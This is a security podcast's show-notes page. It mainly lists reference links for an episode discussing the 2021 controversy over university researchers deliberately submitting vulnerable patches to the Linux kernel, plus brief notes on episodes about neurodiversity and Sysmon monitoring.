@modmasha Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
27 Apr 2021 | 2021-015-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss -part1 | 00:47:26
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Gietzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed
https://twitter.com/UMNComputerSci/status/1384948683821694976
Response to researchers on the Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah.com/
https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
https://github.com/QiushiWu/qiushiwu.github.io
NSF Grant application (thank you Page!): https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent - Human Subjects | NSF - National Science Foundation
The researchers issued an apology today, 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/
*thanks to Zack Whittaker’s security mailing list..*
Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset? Co-author of: https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke’s IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where’s the line on this?
24 Mar 2023 | Dish Network is still busted, John Deere avoiding OSS requests, Is DAST dead? | 01:29:37
04 Apr 2018 | 2018-011: Creating a Culture of Neurodiversity | 01:10:36
Megan Roddie discusses being high-functioning autistic, and we discuss how companies and management can take advantage of the unique abilities of those with high-functioning autism. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-011.mp3
Matt Miller's Assembly and Reverse Engineering Class: Still can sign up! The syllabus is here: https://drive.google.com/open?id=1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0
SHOW NOTES:
Link to Megan’s slides: Megan Roddie (@megan_roddie)
07 Aug 2022 | Amanda's Sysmon Talk -p1 | 00:37:13
This week Amanda, Brian, and Bryan discuss sysmon, how it works to detect IOCs in your org, and how it extends beyond regular Windows event monitoring.
oh... and it's available for Linux too! BrakeSec is: https://www.brakeingsecurity.com
Our #twitch stream can be found at: